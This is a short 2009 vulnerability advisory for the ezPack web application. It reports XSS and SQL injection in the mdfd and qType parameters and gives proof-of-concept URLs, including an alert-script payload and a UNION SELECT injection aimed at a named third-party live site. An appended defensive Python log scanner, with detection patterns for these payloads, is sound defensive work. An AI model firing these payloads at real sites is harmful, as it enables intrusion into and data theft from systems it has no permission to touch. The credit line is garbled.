ezPack 4.2b2 (XSS/SQL) Multiple Remote Vulnerabilities

2009.01.10
Credit: !-BUGJACK-!
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89, CWE-79

+++++++++++ EZpack (XSS/SQL) Vulnerability ++++++++++
************************************************************************
ProDuct Name : EZpack
Download : http://www2.se-ed.net/fatcoder/?mode=download
Author : !-BUGJACK-!
Site : www.it-dark.com
+***************************************************************+
[SQL]
http://localhost/ezPack/op=prog&mdfd=webboard&act=1&ID=1&qType=ID+[SQL]
*****************************************************************+
[XSS]
http://localhost/ezPack/?op=prog&mdfd=[XSS]
*****************************************************************+
Demo XSS
http://www.khokhaoislandbeach.com/ezPack/?op=prog&mdfd=<script%20type="text/javascript">%20alert('xss')%20</script>
Demo SQl
http://www.khokhaoislandbeach.com/ezPack/?op=prog&mdfd=webboard&act=1&ID=1&qType=0'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
************************************************************************
Anuwat555 Dol2&#224;&#185;&#65533;E&#224;&#185;&#65533;MoN K33&#224;&#191;!N IT-DarK Team. All
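For defenders running ezPack, the two parameters named above (mdfd and qType) can be watched in web server access logs. The following is an added example, not part of the original advisory or of ezPack: it assumes Apache/nginx-style request lines and that legitimate values are short identifiers such as "webboard" or "ID"; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate mdfd/qType values are short identifiers ("webboard", "ID").
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,32}")
WATCHED = ("mdfd", "qType")  # parameters named in the advisory
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"[<>]")
SQL_META = re.compile(r"'|/\*|--|\b(?:union|select)\b", re.I)
APP_PATH = "/ezpack/"

def classify(value):
    """Return None for an identifier-like value, else a coarse label."""
    if SAFE_VALUE.fullmatch(value):
        return None
    if MARKUP.search(value):
        return "xss"
    if SQL_META.search(value):
        return "sqli"
    return "malformed"

def scan(lines):
    """Return (line_number, parameter, label) for each suspicious ezPack request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        parts = urlsplit(match.group(1))
        idx = parts.path.lower().find(APP_PATH)
        if idx < 0:
            continue
        # The advisory's first URL has no "?": fall back to the text after /ezPack/.
        query = parts.query or parts.path[idx + len(APP_PATH):]
        for name in WATCHED:
            for value in parse_qs(query).get(name, []):
                label = classify(value)
                if label:
                    findings.append((number, name, label))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """
192.0.2.10 - - [10/Jan/2009:10:00:00 +0000] "GET /ezPack/?op=prog&mdfd=webboard&act=1&ID=1&qType=ID HTTP/1.1" 200 5120
198.51.100.7 - - [10/Jan/2009:10:00:05 +0000] "GET /ezPack/?op=prog&mdfd=%3Cscript%3Ealert('xss')%3C/script%3E HTTP/1.1" 200 4301
198.51.100.7 - - [10/Jan/2009:10:00:09 +0000] "GET /ezPack/?op=prog&mdfd=webboard&act=1&ID=1&qType=0'+UNION+SELECT+1,2,3/* HTTP/1.1" 200 4417
198.51.100.7 - - [10/Jan/2009:10:00:12 +0000] "GET /ezPack/op=prog&mdfd=webboard&act=1&ID=1&qType=ID'/* HTTP/1.1" 404 310
192.0.2.10 - - [10/Jan/2009:10:00:20 +0000] "GET /other/?mdfd=%3Cb%3E HTTP/1.1" 200 100
""".strip().splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same identifier allow-list is the natural server-side input check for both parameters, alongside parameterized queries and output encoding in the application itself.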

References:

http://www.securityfocus.com/bid/33131
http://www.milw0rm.com/exploits/7680

